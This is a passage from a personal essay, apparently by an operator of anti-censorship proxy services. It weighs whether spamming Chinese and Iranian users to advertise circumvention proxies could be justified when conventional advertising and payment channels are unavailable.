    But, because the benefits of the product outweigh the costs of the advertising, that means in a mostly-free country where your product is legal, you can also buy advertisements to get people's attention, pass the costs on to the customers in the form of slightly higher prices, and have benefits for them left over (otherwise they wouldn't still buy what you're selling). The customers still get the major benefit, the benefit of owning your awesome product. What's missing in this case is the small extra benefit that they were getting before, from you stealing from all the spam recipients and passing the savings on to them.

    So for that reason, spammers are prohibited from saying "The benefits of my products exceed the costs of people's attention span to read about it, so it's OK for me to spam", by the reply: "If the benefits really exceed the costs, then you can buy advertising to tell people about it like everyone else."

    But now the big question: Would that argument still hold if you wanted to advertise proxies to people in China and Iran?

    It doesn't seem that you could use conventional channels to advertise proxies to Chinese and Iranian users. If you bought ads on Google AdSense or a similar ad-serving network, China might threaten to block all ads served from that network unless they started screening out ads for anti-censorship services (especially in the case of Google, which seems to comply with most Chinese self-censorship demands). Then there's the question of how to charge Chinese and Iranian users even small amounts for the services. It would not be a good idea to have the charges show up on their credit cards issued by Chinese banks. Paying small amounts with PayPal would be a little bit better since the charge would simply show up from "PayPal", without revealing the recipient. And since all traffic to the PayPal site is encrypted over SSL, Chinese censors wouldn't be able to detect or block users who were paying to circumvent the Great Firewall, unless they blocked all traffic to the PayPal site. But could PayPal be leaned on to provide the identities of Chinese users who were paying for circumvention services, under threat of having their site blocked otherwise? And the biggest impediment of all would be that once you start charging even $1 for a service, there's a huge dropoff in people willing to sign up, even if they would have to spend much more than $1 worth of effort to find a free alternative somewhere else.

    So, if circumvention services provide enough benefit to Chinese users, maybe spamming proxy sites would do more good than harm, and if the lack of freedom in the country means that you could not sell or advertise the services to Chinese users by conventional means, maybe that means spamming the proxy locations would be the only way to do this.

    Reading over this, I just realized that if you also believed that pot was beneficial to society, this could also justify spamming to advertise pot. I expect we'll all start getting marijuana spam just as soon as the pothead reading this gets around to it... on, like Tuesday... maybe. Just make sure they don't really get their act together enough to get pot legalized, because if that happens, they lose their rationale for spamming to advertise it! (Thinking about the pot question more seriously, I'd say that if the government banned sales and advertisements of something beneficial like milk, then spamming to advertise milk would be a good thing. The only real argument against spamming for pot is that it isn't as beneficial as milk.)

    So that's the mathematical argument in a nutshell:

    1. Spam is bad because the costs to society are greater than the benefits. This would not be the case if you were spamming to advertise something whose benefits were greater than the costs of the spam.
    2. However, in a mostly-free country where your product is legal to sell, #1 should never be used to justify spamming, because if the benefits of your product are really greater than the costs of the advertising, you can pay for the advertising, add the costs on to the cost of the product, and still have benefits left over to split between the seller and the customer.
    3. #2 is not true in non-free countries like China, in which case if a product conferred more benefits than the costs of the spam but was not legal to sell, it might be OK to spam it.

    Perhaps this logic is flawed, and I'm sure some people will tell me why they think so. The other question is whether these circumvention services really provide as much benefit to the Chinese and Iranians as those of us who run the services would like to believe. Earlier I argued that the real obstacle to most anti-censorship services is apathy on the part of the target audience, and that it was an unpleasant surprise, when I found some Chinese users on MSN Messenger to ask for help with some technical issue, to find that most of them either supported the Chinese government's censorship or didn't care enough to do anything about it. So for proxy spam to be defensible, it should -- come on, all together now, I can't believe I'm quoting the members of the industry that is the bane of my existence -- include an unsubscribe link that users can click to stop receiving any further e-mails. And a postal return address! Because who could have any cause to complain about an unsolicited e-mail that includes the sender's full mailing address in the footer?